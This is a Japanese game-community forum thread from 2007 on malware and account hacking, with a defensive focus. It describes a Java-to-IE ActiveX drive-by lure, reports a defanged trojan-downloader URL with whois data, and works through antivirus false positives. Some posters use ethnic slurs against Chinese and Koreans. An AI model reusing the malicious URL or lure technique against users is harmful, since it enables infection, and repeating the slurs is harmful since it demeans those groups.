先日、Xblock Systems社から興味あるスパイウェアサイトの連絡がありました。そのサイトにアクセスすると何が起こるかをスクリーンキャプチャしたファイルを見ました。それはFirefoxをブラウザとして使っていても、ActiveXドライブバイダウンロードでスパイウェアをインストールされてしまうという例でした。ストーリーは、次のようなのもです。
1. Firefoxの新規インストール状態で、問題のWebサイトをアクセスします。同じコンピュータには、SP2の適用されたIEもインストールされています。
2. そのサイトでは、Javaランタムが必要なのでSun JavaからJREをインストールするかどうかを確認します。
3. JREは、Sunから問題なくインストールされます。
4. JREがインストールされるとJavaプログラム(アプレット)がそのサイトからロードされ実行されます。
5. Javaアプレットは、IEを起動し、されにJavaアプレットがIE内で実行されます。
6. 画面は、いつの間にかIEになり、グラフィックスと共に、次手順が表示されています。
7. 画面の指示には、ブロックされているActiveXのコントロールを解除するよう表示しています。
8. ActiveXの解除方法を分かりやすく手順ごとに説明しています。
9. 手順通りに進むと、ActiveXコントロールが実行され、ブラウザがハイジャックされます。
実に巧妙な手順で、何とかActiveXをクライアントコンピュータ上で実行させようとしています。興味のある点は、Firefoxでは、ActiveXが実行できないので、FirefoxからIEを起動し、 SP2が適用されていたら、ActiveXコントロールを解除するようユーザにその手順を提供し、最終的にActiveXを実行させてしまうことです。フィッシングのように巧みにユーザを騙し、ユーザにActiveXを実行させる方法です。
ここまでされると、もはやFirefoxを使っているから安心ともいえなくなりますね。
-------------------------------------------------------
FFだろうがオペラだろうが、今は知名度が低いから狙われていないだけ。
だから、現状ではIEに比べてましかもしれないが、将来も安全であるとは言えない。 <>
(○口○*)さん<>sage<>07/09/04 14:14 ID:S45iN9a00<> >>81
直踏みが、ダウンロードではなく、実行だった場合はアウトだが、「おおまかな概念」の場合は
発動って思ってて貰った方がいいかもしれん。
>>80
「安全である」というのは間違い。
「標的にされにくい」というのであれば正しい。 <>
(○口○*)さん<>sage<>07/09/04 14:31 ID:FnyfT11J0<> >>81,83
exeはただダウンロードしただけならまだ大丈夫なんですね
ダウンロードしたら自動実行とかついていそうで怖いですが
>>82
動かないなら無理矢理動く環境を呼び出せばいいという発想ですか
そんな手段もあるとは
現状IEに比べて仕掛けられる罠は少ないけど今後増える可能性は十分あるので
やはり注意するに越したことはないということですね。
乗り換えた上でソースチェッカーやURL検索も使って気をつけようと思います
ありがとうございました <>
(○口○*)さん<>sage<>07/09/04 15:05 ID:LESR6DYO0<> セキュリティベンダーも、ブラウザの脆弱性への対処手段が売り物になると判断したようで、今期・来期の新機能に掲げている例もある。
例えば、Symantecは「カナリア」と称している。
ttp://japan.cnet.com/news/sec/story/0,2000056024,20351463,00.htm
ブラウザの選択肢としては、OSの根幹とあまりに近すぎる存在であるIEは、使用にあたり最新の注意を要するのが実状。
その他、サードパーティブラウザを使用する際にも、極力安全面を重視する設定や、追加機能などを選定するのが望ましい。
例として、Firefoxであれば、NoScriptアドオンが威力を発揮する。許可されたサイト以外でのJavaScript動作を禁止するので、
安全性が高められるだけでなく、セッションに遅滞が起こりがちなscriptを使用しているサイトの閲覧速度向上にも役立つ。 <>
(○口○*)さん<>sage<>07/09/04 16:14 ID:K8sGnSmr0<> >>82
JREの穴かねぇ。
Javaがブラウザ経由でローカルのプログラムを呼び出せちゃまずい。 <>
にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん
(○口○*)さん<>sage<>07/09/04 23:43 ID:oAJVsznc0<> はっ・・・
ごめんなさい
hを消し忘れましたorz <>
(○口○*)さん<>sage<>07/09/04 23:48 ID:UCu+V57X0<> テンプレを読めh消せば言い訳じゃない
そんなんも読めない奴は垢ハックにもであってろ <>
(○口○*)さん<>sage<>07/09/04 23:48 ID:4pBL7OBr0<> 中華死ね <>
(○口○*)さん<>sage<>07/09/04 23:57 ID:t2Q2rGk10<> >>87
ソースチェッカーでも使ってよーく調べてみろ
そんで削除依頼ぐらい自分でしなよ <>
(○口○*)さん<>sage<>07/09/05 03:58 ID:aXnM2wO9O<> >>87
私もうっかり踏んでしまいました。
調べようとして、間違って踏んでしまったとかorz
日を変え、品を変え、かれこれ10回ぐらいウィルスチェックしてますが、今のところウィルスは見つかってません。
課金切れてるし、あまりやる気がしなくて踏んでから一度もログインしてないので、実際のところウィルスに感染してるのかどうかはわからないのですが…。
一応、そのドメインは危険サイトリストに載ってるし、クリーンインストールした方がいいことはわかってるんですがねぇ。 <>
(○口○*)さん<>sage<>07/09/05 04:03 ID:0m1vE8vm0<> 87は早く削除依頼してこいよ <>
(○口○*)さん<>sage<>07/09/05 05:53 ID:hfEdP8Je0<> >>14さんのようにRO2起動・終了時に警告が何度か出るのですが、nProの動きを感知しているものとしてスルーしていました。
先ほどROを起動しようとしたらD:(中略)Ragnarok.exeでInvaderを検知したのですがこれもnProでしょうか?
一応カスペで完全スキャン中ですが、昨日はRO2→RO起動をしても何も出なかったので気になっています。 <>
(○口○*)さん<>sage<>07/09/05 08:06 ID:7npBK9TM0<> カスペのマニュアルより
http://dnl-us5.kaspersky-labs.com/docs/japanese/kav6.0_winwksja.pdf
リスクウェア
悪意のある機能を持っているわけではないが、セキュリティ上のエラーや不具合がある
ため、それらを利用してハッカーが悪意のある機能を実行するための補助ソフトとして利
用するもの。一定の条件化で、このようなプログラムを実行するとコンピュータは危険な
状態にさらされます。これらのプログラムには、キーロガー、リモート管理ツール、キーボ
ードレイアウト切り替えツール、IRC クライアント、FTP サーバ、プロセス監視ツール、操
作隠蔽ツールがあります。
「プロセス監視・操作隠蔽」が、今回の件に該当すると思われる。
nProtectの動作を許容するなら許可、許容できないなら、不許可にしてアトラクションIDと癌ID削除。
セキュリティの面からすると、推奨は後者になる。全ては自己責任で判断し、行動すること。 <>
(○口○*)さん<>sage<>07/09/05 08:09 ID:7npBK9TM0<> カスペのマニュアルより
http://dnl-us5.kaspersky-labs.com/docs/japanese/kav6.0_winwksja.pdf
Kaspersky Anti-Virus for Windows Workstation 6.0 では以下に挙げる 2 つの方法を使って、マ
ルウェアの検知とコンピュータの保護を行います。
リアクティブ - この方法は悪意のあるファイルを定期的に更新されるデータベースを使って検
知します。そのためにデータベースの更新作業を伴います。
プロアクティブ - リアクティブとは反対に、分析するデータベースを使用しません。システム
のふるまいでスキャンを行います。この方法はデータベースに登録される前の新種のウイル
ス検知を目的としています。
この記述を見る限り、プロアクティブ(NOD32で言うところのヒューリスティックスキャン)を切れば
nProの検知は行われないと思われる。但し、新種の検知能力が落ちる為に、この設定は推奨できない。 <>
(○口○*)さん<>sage<>07/09/05 19:59 ID:uw2G/F7g0<> こっちにも張っとこう
一太郎、Lhaz、ラグナロクなど8月は標的型攻撃が頻発〜トレンドマイクロ
ttp://internet.watch.impress.co.jp/cda/news/2007/09/05/16804.html
また、「ラグナロクオンライン」のアカウント情報を盗み取ろうとするTSPY_MARANが1位に入った点や、
オンラインゲーム「リネージュ」のアカウント情報を盗み取ろうとするTSPY_LINEAGEが、
7月に複数の正規Webサイトの改竄で拡散した結果4位に入ったことを挙げ、
「情報や金銭の不正な取得を目的として、
特定のソフトウェアやサービスの利用者を標的とした攻撃が頻発している」として注意を呼びかけている。 <>
94<>sage<>07/09/05 22:03 ID:acWMHKz00<> >>95-96
丁寧にありがとうございます。
やはりnProを誤認識しているようなので今までどおりスルーさせておきたいと思います。
スキャンにかけたまま出かけて今帰ってきたのですが何も検出されなかったようです。
ただ一度電源を切るときにROとは関係ない部分(Windows〜とあった気がします)でInvaderの亜種がどうのという表示が一瞬出ました。
一瞬だったので細かく見れなかったのですが、ROと関係ないところだったので少し不安です。(PCを落とすときに出たのも初めてで…)
不安ならOS入れ直せと思われるかもしれませんが、これがウィルスでなければ何度入れ直しても同じことになってしまうので
分かる方や同じ症状になる方がいましたらご助言いただけると助かります。 <>
94<>sage<>07/09/05 22:13 ID:acWMHKz00<> よく見たらログが残っていました。
検地しました:リスクウェア Invader プロセスを実行します。:C:\WINDOWS\system32\winlogon.exe
などで、>>14さんと全く一緒のようでした。
ということは何事もないということで大丈夫ですね。
落ち着いてきちんと読んでおけばよかったです。お騒がせして申し訳ありませんでした。 <>
(○口○*)さん<>sage<>07/09/06 13:11 ID:w4dUNY9U0<> 一応、これも張っておくか。
ttp://kaspe.2chv.net/wiki/index.php?PDM#m7b53deb
2chセキュ板発祥のWikiなので、好き嫌いはあるかとは思われるが。
ただ、内容は十分にFAQ的要件を満たしていると思われるので、いっそテンプレ入りさせるのもありかな。 <>
(○口○*)さん<>sage<>07/09/07 00:48 ID:5tDyS9m40<> 「セキュリティソフトの体験版をどうぞ」、トレンドをかたる偽メール:ITpro
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070906/281362/
TrendMicroの偽サイトによるフィッシング行為なのだが、例によって発信元がcn。
今回は選んだ相手が悪かったからか、ドメイン登録は既に抹消済みの模様。 <>
(○口○*)さん<>sage<>07/09/07 02:35 ID:dpaDTkgJ0<> チャイナのリモホは双方向で全ブロックしておいた方がよさそうだな・・・ <>
(○口○*)さん<>sage<>07/09/07 07:53 ID:Ycxh7aIi0<> WinFixerとかSystemDoctorとかWinAntiVirusProとか昔からある手法だな。 <>
(○口○*)さん<>sage<>07/09/07 16:00 ID:4enl2jBG0<> 誘導されてきました
【 アドレス 】 http://nilgiri2■blog57■fc2■com/
「tyr gvg links」:http://r■hatena■ne■jp/cnumlab/
tyrのgvg関連のblogのはてなRSS(オンラインRSSリーダー)なのですが
登録されている「冬ノ道ノセイ」というblogが
「らいくちゃんが行く」というblogになり
しかも内容が新規プレイヤーであるかのようなものに書き換わっていました
>出陣じゃぁ
>2007/09/06(木) らいくちゃんの日記 トラックバック:0 コメント:0
>ラグナロクオンラインをしてみることにしました。
>裸一貫のスタートということで
>のんびりプレイしてみたいと思いましゅ。
>当面は魔法使いを目指すことにしました。
>お金を貯めてS1アークワンドという武器を45kで
>買いました。次はプパCの刺さった防具を買いたいな^^
>どの敵なら倒せるか、いろいろ試してみます。
>がんばるじょぉ!!
アカウントハックコメントのコピペのようでもあり不安になったのですがこれは安全なのでしょうか
ソースには<meta http-equiv="content-script-type" content="text/javascript">が含まれているものの
スクリプトそのものらしきものは見当たりませんでした(見落としているだけかもしれません)
元の利用者が退会し新たに同URLでblogを始めた人がたまたまROを新規スタートしただけであればいいのですが <>
(○口○*)さん<>sage<>07/09/07 19:21 ID:/j7quyds0<> ゲーム不正アクセスの少年逮捕
ttp://www.sponichi.co.jp/society/flash/KFullFlash20070906071.html
※ハンゲーム <>
にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん<>にゅぼーん
(○口○*)さん<>sage<>07/09/08 18:56 ID:nTq6ttSp0<> 下がってるから上げようと思ったけど106みたいなのは削除対象? <>
(○口○*)さん<>sage<>07/09/08 22:19 ID:rHYURyEK0<> それがライセンス違反かどうかわからないから微妙。消してもらった方が無難だとは思うけど。
オークションの宣伝だしね。このスレ的にはあまり推奨できない。 <>
(○口○*)さん<>sage<>07/09/08 22:33 ID:ztvI6X2H0<> オクに出てる大半が割れ物だからなぁ <>
(○口○*)さん<>sage<>07/09/10 02:32 ID:Rk5HFbwW0<> 国内版での見解。
ttp://www.just-kaspersky.jp/products/faq/faq05.html?w=qa31#031
>Q 複数ユーザー版(2+1ユーザー/4+1ユーザー/10ユーザー)は、それぞれ別ユーザーで使用できますか
>A 使用許諾上、家庭内、または、お客様が法人の場合は当該法人が管理するコンピュータに限り本製品をインストールして、
>ご家族、または、所属の方が別ユーザーで利用することが可能です。
赤の他人に再販した時点で、EULAには確実に違反する事になるわな。
通報されてアクティベート無効にされるリスクもあるだろうし、怪しいものには手を出さないのが賢明。 <>
(○口○*)さん<>sage<>07/09/10 14:00 ID:x8cXqQOu0<> オークションに出ているWindowsXPとかと似たようなもんだな。
安物買いのなんとやら。 <>
(○口○*)さん<>sage<>07/09/10 19:20 ID:MhXhM7WA0<> 大体、何よりも信頼性(性能だけじゃなく色んな意味でな)が重要なセキュリティーソフトを
ネットオークションみたいな来歴があやふやな中古品で済ませようって時点で
何かが間違ってるような気がするぜ・・・。 <>
(○口○*)さん<>sage<>07/09/10 19:23 ID:eS+Sw8ub0<> 日本人狙う偽セキュリティソフト「MalwareBurn」、ウェブルートが警告
http://internet.watch.impress.co.jp/cda/news/2007/09/10/16845.html <>
(○口○*)さん<>sage<>07/09/11 14:34 ID:VYZBRvNP0<> 「Skype for Windows」を介したワーム感染が確認される
ttp://internet.watch.impress.co.jp/cda/news/2007/09/11/16857.html
中華がこの手法とかを使ってくる可能性もあるだろうから、ご注意を。 <>
(○口○*)さん<>sage<>07/09/11 22:49 ID:qY0jl3ce0<> ジャストシステム
・アンチウイルス「カスペルスキー7.0」シリーズ、9月14日、9,240円〜13,440円
http://www.justsystem.co.jp/news/2007l/news/j09111.html <>
(○口○*)さん<><>07/09/12 08:21 ID:EblVz6Ba0<> WindowsUpdate日あげ <>
(○口○*)さん<><>07/09/12 08:50 ID:k/ufUaXv0<> 月例age
緊急(1) 重要(3)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms07-sep.mspx <>
(○口○*)さん<>sage<>07/09/12 10:39 ID:8p1hovkM0<> 昨夜か一昨日だか、土器鯖の十字路↓の方で
+8マジェや+7#や狩り装備一式が並んでる露店があったなぁ
そのすぐ上に下のは垢ハック露店なので注意って露店が出ていて、
あぁまた被害者が出たのかなあとか思った
シナとチョンどもにはやれやれだ <>
(○口○*)さん<>sage<>07/09/12 13:10 ID:63suF33D0<> NOD32上位版の「ESET Smart Security」、日本語ベータ版が公開
http://internet.watch.impress.co.jp/cda/news/2007/09/11/16864.html
取り敢えず、これから入手してみることにする。 <>
(○口○*)さん<>sage<>07/09/12 13:59 ID:EblVz6Ba0<> NODは軽いのが一番大きなところだったからなぁ
ゴチャゴチャと機能が付いて重くな(りそう)るのはどうなんだろう
素直にkasperskyにした方が良いような気もする <>
(○口○*)さん<>sage<>07/09/12 16:41 ID:L13J/ha50<> 自分のところにも案内のメールが来てたな。
NOD32同様Win2kSvが入ってるのが非常に有りがたいので、早速申し込みしてきた。
>120
カスペは作業用マシンに入れてるが、一部のサイトで何か通信ブロックが発生して
異様に遅くなるケースがあるのがなぁ。
カスペのWiki見て調べたんだが、結局解決策が見つからなかった。 <>
(○口○*)さん<>sage<>07/09/12 17:19 ID:sLcX6RK60<> >>121
それ自分でブロックして忘れてるだけなんじゃ・・・
具体的なアドレスはどこ? <>
(○口○*)さん<>sage<>07/09/12 17:36 ID:L13J/ha50<> >122
今のところimpressとYouTubeで確認してる。
同じ様にカスペを入れてる友人のPCでは問題ないし、NOD32入れてる自宅鯖も問題ない。
同様の現象が無いかとググったら、同じ様な人をちらほら見かけたんだが、具体的に
○○の設定で直ったという事例も見つからなかったし、極稀に相性の問題が出るのかも。 <>
(○口○*)さん<>sage<>07/09/12 17:45 ID:63suF33D0<> >>123
PG2入れてると、IDCなんたらってとこに繋ごうとしてるの確認できるが、それじゃないかな。
何度かリロードすれば、表示されるけど、面倒くさくなったので許可だしちゃったよ。
それ以降は、あっさり表示できるようになったし。
PG2入れてても、ブロックリストによっては弾かないこともあるかも。 <>
(○口○*)さん<>sage<>07/09/12 17:53 ID:sLcX6RK60<> >>123
自分は家族中のマシンを面倒見ていて、3台分カスペ入れてあるけど
問題ないようにみえている。少なくともYouTubeでいくつかの動画、
を見たけど問題なし。
impressは、、、うむたしかに表示遅いなとか見てみたけど、これ
ソース見ると、本文の「テーブルの深いところで」、JavaScriptの
document.writeつかって複数のブロックを別のセッションから
読み込むようになってるじゃん。
これじゃ、該当部分の全部のHTTPのセッションが終わらないと
この画面を構成できるわけない。
ひょっとして、上部のバナーというかメニューだけは先に出て、中身が
出るのが遅いことをいってる?
それだと、impressのサイトの仕様。
ちなみにカスペ切って(一時的に動作とめて)も同じなんじゃない? <>
(○口○*)さん<>sage<>07/09/12 18:03 ID:L13J/ha50<> >124-125
遅いというのは数分〜10数分とかそういうレベルの話。
PG2でブロックされてるために表示されない状態に近くて、impressのサイトの
構成上の遅さとは次元が違う。
で、カスペを一時停止してリロードしたら他サイト同様普通に表示される。
最初はPG2が何かブロックしてるのかと思ったが、PG2は無関係だった。 <>
(○口○*)さん<>sage<>07/09/12 18:08 ID:63suF33D0<> 209.225.0.102
209.225.0.104
この辺へのアクセスブロックしてるとインプレスの表示が止まるけどな。あとは知らんわ。 <>
(○口○*)さん<>sage<>07/09/12 18:08 ID:sLcX6RK60<> うーん、それは全然違う話しだなぁ。
とりあえず、母と妹のマシンを見てくるか、、、
自分は問題ない(数秒止まる「時もある」程度)し。
といっても同じ設定のはずだから家族のじゃダメ(問題ないと思う)か。
再インストールしてみて設定初期化してみたら? <>
(○口○*)さん<>sage<>07/09/13 12:32 ID:jKTZxOLX0<> なんか手動でWU確認しようとしたらPG2がはじいて確認できん・・・
前からWUで韓国にアクセスするようなことあったっけ? <>
(○口○*)さん<>sage<>07/09/15 05:44 ID:+U7ij8HU0<> 警察へ駆け込んで装備が戻ってきた人はだいたい何ヶ月くらいかかったの? <>
121<>sage<>07/09/16 16:30 ID:ZKMGB5WT0<> YouTubeやImpressの表示の問題、単純にカスペの入れ直しでは直らなかったんだが
9/14付けでVer7.0がリリースされてたので入れてみたところ直った。
ただし正確に言えば
・IE7.0のアンインストール・WU当て直し
・KIS6.0のアンインストール
・IE7.0のインストール・WU当て直し
・KIS7.0のインストール
と複数の要素が重なってるために、カスペ6.0固有の問題かどうかははっきりせず。
それとカスペのアップグレードのページを張っとく。
http://www.just-kaspersky.jp/support/vup7.html <>
(○口○*)さん<>sage<>07/09/16 20:20 ID:9GNKsY6w0<> なぁなぁ
カスペさんまた誤検出してね?
WEB版の『重要な領域をスキャン』ですぐに感染してるって引っかかる項目が。
メインPCでもサブPCでも同じのが感染してるようなんだが・・・
どう見てもこのファイルは・・・ちっとみんなもやってみてみてみ <>
(○口○*)さん<>age<>07/09/16 20:34 ID:fA3UwWm/0<> みたいだなぁ
しかもキーロガー系とか言われると怖くてログインできんわ <>
(○口○*)さん<>sage<>07/09/16 20:43 ID:v8FGq5M50<> いや、キーボードドライバーのっとってるからキーボードロガーと出てくるのは至極当然だと思う。 <>
(○口○*)さん<>age<>07/09/16 20:59 ID:fA3UwWm/0<> C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\ntkrnlpa.exe
感染: Trojan-Dropper.Win32.Agent.bwf
って出るけど・・・みんな? <>
(○口○*)さん<>sage<>07/09/16 21:10 ID:Yg9WimHF0<> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
の中のUserinitがC:\WINDOWS\system32\userinit.exe,
じゃなくて
C:\Windows\system32\userinit32.exe
だったら本当に感染。のはず? <>
(○口○*)さん<>sage<>07/09/16 21:18 ID:6YmIhCnR0<> オンラインスキャンだと出るけど製品版では出ないな
使用しているパターンかエンジンが違うんだろうな <>
(○口○*)さん<>sage<>07/09/16 21:21 ID:jr5SFPB60<> つまり、9/11に配布されたnProのサービスがキーロガーとして認識されるんだろ。
どっかのスレの情報では、キーボードドライバを乗っ取って、キー入力の暗号化と復号化をして、
垢ハック防止するのが目的のものだって言われてたから、キー入力を横取りして、暗号化してから
サーバーに送る訳で、結構妥当な判断だと思うな。宛先が正当かどうかは、セキュリティ会社が
判断できる訳じゃなさそうだし。
うちは、手動削除して前のexeに戻しちゃったけど残骸があったってことだな。あとで削除しとこう。
なお、同じファイルはNOD32では検出されません。 <>
(○口○*)さん<>sage<>07/09/16 21:27 ID:jr5SFPB60<> あー、ごめん。これ確実に誤検出だ。nProのファイルじゃないや。
ファイルのプロパティ見たら、MS製だった。フォルダ名に該当する元ファイルも検知しやがるわ。
http://www.microsoft.com/downloads/details.aspx?FamilyId=F0683E2B-8E8F-474F-B8D8-46C4C33FCE99&displaylang=ja <>
(○口○*)さん<>sage<>07/09/16 21:35 ID:jr5SFPB60<> カスペの検体提出窓口に、誤検出として報告入れといたから、暫くしたら対応されると思う。 <>
(○口○*)さん<>age<>07/09/16 21:35 ID:fA3UwWm/0<> 明日のWEBスキャンアップデートでまた何もなかったのかのように修正されるのかな・・・ <>
(○口○*)さん<>sage<>07/09/16 21:37 ID:9GNKsY6w0<> みんなありがとう
マジ安心した
こういうのって複数の人で調べてみないとわからないものだもんなぁ・・・
でも、実際に感染したときにまた誤検出かーみたいに安心しないようにしておこう <>
(○口○*)さん<>sage<>07/09/16 21:48 ID:UZ+GvzYB0<> 我が家でもカスペで>>135さん同様検出されました
役に立つかどうかはわかりませんが、検出時のこちらの状況を
感染しています: トロイ Trojan-Dropper.Win32.Agent.bwf
c:\windows\$hf_mig$\kb890859\sp2qfe\ntkrnlpa.exe
バージョン:カスペルスキーインターネットセキュリティ 6.0.2.614
定義ファイル発効日:2007/09/16 20:19:49
(検出→削除後に再チェックする為に更新してしまったので、19時あたりの定義ファイルだと思います)
金曜あたりから忙しく、PCの電源は入れるもののブラウザを一回も立ち上げませんでした
本日午前中、8時頃だったと思いますが一度完全スキャンを行っており、その時は何も検出されませんでした
さらにルータを介したPC2台同時検出だったので、なんとなく怪しいとは思いましたが… <>
(○口○*)さん<>sage<>07/09/16 21:56 ID:jr5SFPB60<> >>135-143
カスペから、検体提出の返答。誤検出であるとの返事です。修正したので定義を更新せよと。
Hello.
We are sorry for this false alarm.
It already fixed, please update your bases. <>
(○口○*)さん<>age<>07/09/16 21:58 ID:fA3UwWm/0<> そうそう。うちも最近ログイン前とかにスキャンするようになっちゃってて
それでこれだったのでおかしいなぁと思ってました
似たようなこと、これで確か2回目かなぁ <>
143<>sage<>07/09/16 21:58 ID:UZ+GvzYB0<> ちょっと遅かったか…!
実は、以前こちらとアカハック対策スレに何度かお世話になっており(幸い被害にはあっていませんが)
「またOS入れなおしか…」とちょっと凹みながら情報集めをしていたところ、こちらで「誤検出では?」の書き込みを発見したのでかなり安心できました
先に情報提供してくれた>>135さん、いろいろ調べてくださった皆様、カスペに誤検出報告してくださった>>140さん
本当にありがとうございました <>
(○口○*)さん<>sage<>07/09/16 21:59 ID:jr5SFPB60<> カスペルスキー オンラインスキャナ バージョン 5.0.78.1 がインストールされています。
現在のデータベースのリリース日は 2007年9月16日 レコード数は 393707 です。
オンラインスキャンのこの定義ファイルでは検出されません。もう直してますね。早いなぁ。 <>
(○口○*)さん<>sage<>07/09/16 22:04 ID:9GNKsY6w0<> みんなおつありです!
ところで検体の検出っていうのはどうやるんでしょう
あんまり英語などに明るくないので避けたほうが良いのでしょうか?
それと、WEBスキャンの「マイコンピューター」の項目は「重要な領域」のスキャン。で検索してくれる場所もスキャンしてくれていますよね?
ちょうど今さっきマイコンピューターで検索したところ見つからなかったので・・・修正後だったのかもしれませんが念のため・・・ <>
143<>sage<>07/09/16 22:09 ID:UZ+GvzYB0<> 途中で書き込み押してしまったorz
>>146の続きですが
誤検出だったということは、カスペのバックアップを元に戻しても問題ないのでしょうか?
c:\windowsのファイルということは、消してしまうと問題がありそうな気がして… <>
(○口○*)さん<>sage<>07/09/16 22:13 ID:jr5SFPB60<> >>149
戻してもいいし、>>139のリンクから入れなおしてもいい。 <>
143<>sage<>07/09/16 23:17 ID:UZ+GvzYB0<> >>150さん
遅くなりましたが、戻してから一応再スキャンかけてみます
ありがとうございました <>
(○口○*)さん<>sage<>07/09/17 00:18 ID:R1EzDTiQ0<> >>148
ROアカウントハック対策スレのまとめサイト - 検体についてのアレコレ
ttp://sky.geocities.jp/vs_ro_hack/specimen.htm
上記参照。 <>
(○口○*)さん<>sage<>07/09/17 15:05 ID:d1aiVHZM0<> 質問です。
今のトロイはウィンドウズアップデートしてても掛かるものなのでしょうか? <>
(○口○*)さん<>sage<>07/09/17 15:18 ID:RNhB9Tfv0<> 新しい穴があった場合や新種の物の場合はかかるでしょう
Windowsupdateしてれば安全なんてのも見当違いなのでちゃんと対策してください <>
(○口○*)さん<>sage<>07/09/17 15:28 ID:d1aiVHZM0<> はいー了解しました。 <>
(○口○*)さん<>sage<>07/09/17 15:31 ID:5rGm6YX20<> >153
結論から言えば「WUをしてても掛かるものが存在すると考えた方が無難」。
脆弱性を突くといっても、何もIEやWinだけが脆弱性を持ってるわけじゃない。
Flashプレイヤーだって脆弱性があったし、Operaとかのブラウザにも脆弱性はある。
それらを突くタイプだとWU関係なく感染する可能性が高い。 <>
(○口○*)さん<>sage<>07/09/17 23:31 ID:tKbQwNTT0<> 既出の気もしたが念のため貼っておく
ttp://www.itmedia.co.jp/news/articles/0709/17/news001.html <>
(○口○*)さん<>sage<>07/09/17 23:42 ID:vd5wEBnK0<> >>157
ITmediaだから安全だと思って貰えるとは思うが、貼る時は、記事のタイトル位書いといてくれ。
157のリンク先の記事は下記のタイトルです
Firefox関与のQuickTime脆弱性、US-CERTなどが危険度「高」と評価 <>
(○口○*)さん<>sage<>07/09/18 22:20 ID:KNLFOVah0<> 9/14のkaspersky v7.0に続いて9/18付でF-Secureの2008年版も出た。
どちらも直前バージョンからの無償アップグレードが可能、とのこと。
暇をみてバージョンアップしたいが今週末まで無理。_| ̄|○ <>
(○口○*)さん<>sage<>07/09/18 22:43 ID:z8hpzBfT0<> カスペのアップグレードは、あえて放置しているな
すぐに乗り換えると変な不具合がありそうだし <>
(○口○*)さん<>sage<>07/09/19 01:41 ID:DrUyt18U0<> とりあえずパッチ変更点スレで話題になってるのをコピペ貼りつけ
http://enif.mmobbs.com/test/read.cgi/livero/1189471376/
755 名前:(○口○*)さん[sage] 投稿日:07/09/18(火) 21:59 ID:zPQmgi9A0
今パッチあてたらカスペ先生からこんなのきたよ
とりあえず拒否しといたがなんぞなこれ
検知しました: トロイ Trojan-Downloader.JS.Psyme.lg URL: ht■p://81.95.150.82/tr/index.php//Crypt.DCScript
766 名前:(○口○*)さん[sage] 投稿日:07/09/19(水) 00:46 ID:S/0HEwjZO
うちのカスペルも今日のパッチあててる時に>>755と同じだったんだが
今日のパッチにトロイ入ってる? <>
(○口○*)さん<>sage<>07/09/19 01:41 ID:DrUyt18U0<> 767 名前:(○口○*)さん[sage] 投稿日:07/09/19(水) 00:50 ID:Jo4sLy/90
inetnum: 81.95.148.0 - 81.95.151.255
netname: RBNET
descr: RBusiness Network
country: PA
admin-c: RNR4-RIPE
tech-c: RNR4-RIPE
status: ASSIGNED PA
mnt-by: RBN-MNT
source: RIPE # Filtered
role: RBusiness Network Registry
address: RBusiness Network
address: The Century Tower Building
address: Ricardo J. Alfari Avenue
address: Panama City
address: Republic of Panama
phone: +1 401 369 8152
remarks: Points of contact for RBusiness Network Operations
remarks: ------------------------------------------------------
remarks: Routing and peering issues: noc@rbnnetwork.com
remarks: SPAM and Network security issues: abuse@rbnnetwork.com
remarks: Customer support: support@rbnnetwork.com
remarks: General information: info@rbnnetwork.com
remarks: ------------------------------------------------------
e-mail: noc@rbnnetwork.com
admin-c: JK4668-RIPE
tech-c: JI424-RIPE
nic-hdl: RNR4-RIPE
mnt-by: RBN-MNT
source: RIPE # Filtered <>
(○口○*)さん<>sage<>07/09/19 01:42 ID:DrUyt18U0<> 771 名前:(○口○*)さん[sage] 投稿日:07/09/19(水) 01:02 ID:Jo4sLy/90
Trojan-Downloader.JS.Agent.kd
ttp://www.google.co.jp/search?hl=ja&q=Trojan-Downloader.JS.Agent.kd&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
RBusiness Network
ttp://www.google.co.jp/search?hl=ja&q=RBusiness+Network+&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja
775 名前:766[sage] 投稿日:07/09/19(水) 01:30 ID:S/0HEwjZO
やったことといえば
アトラクションセンターへログイン
RO2起動 終了
RO起動 パッチ当たる
パッチ完了と同時にカスペルがトロイ検出
npro削除データがトロイとしてひっかかったのかと思うも怪しいのでダウンロード拒否
ぐらいなんですが… <>
(○口○*)さん<>sage<>07/09/19 03:16 ID:VKwyM+O00<> nProサービス化削除パッチそのものは、検出しないという報告も上がっていますので、
該当スレの766さん、755さんが、別のものを踏んでいたという可能性があります。 <>
(○口○*)さん<>sage<>07/09/19 08:52 ID:epTuwRUPO<> 該当スレの755氏のアドを調べてみたらやっぱウィルスアドだったわ。
JS_PSYME.ANT(JavaScriptの不正プログラム)
EXPL_EXECOD.A(Windowsのセキュリティホールを攻撃するためのサンプルコードであり不正リモートユーザーは、このセキュリティホールが未修正のPCに対してコマンドが実行されます)
EYPL_ANICMOO.GEN(セキュリティホールを利用して任意のコードを実行)
まぁなんだ脆弱性をついた質の悪いウィルスだけども垢ハクではない模様。
ただ侵入方法がユーザーの手動ダウンロードになってるから不安は感じるね… <>
(○口○*)さん<>sage<>07/09/19 10:17 ID:upIHJ0au0<> ノートン入れてて、昨日のパッチ当て後(確か17時台だった)は通常の通信許可しか求められなかった
先ほどカスペオンラインスキャン終了したが、なにも引っかからず <>
(○口○*)さん<>sage<>07/09/19 21:25 ID:ijKeM+kK0<> ギルメンのだけど・・・
【 気付いた日時 】 9/19 12:30
【不審なアドレスのクリックの有無 】 基本的にRO専用PC 見るとしてもRMCくらい
【 アドレス 】 -
【 OS 】 WinXP Pro SP2
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 8月上旬
【 アンチウイルスソフト 】 NortonInternetSecurity2006
【その他のSecurty対策 】 特になし
【 ウイルススキャン結果】 ノートン・カスペ共に検知できず。
【テンプレの参考サイトを読んだか】 今から読ませます。
【hosts変更】無)
【PeerGuardian2導入】無
【説明】
ガンホーIDそのものの削除。
アトラクションセンターを含む全個人情報閲覧不可能。
ガンホーに問い合わせるもガンホーIDが消去された際
全内部データが削除された為復旧不可能と言われる。
同じ名前のキャラクター作成も可能。 <>
(○口○*)さん<>sage<>07/09/19 21:32 ID:R346NnAw0<> 悪質だな・・・ <>
(○口○*)さん<>sage<>07/09/19 21:33 ID:YZLTCSiV0<> アイテム目的な垢ハックでID事削除されてるのはなんだろう
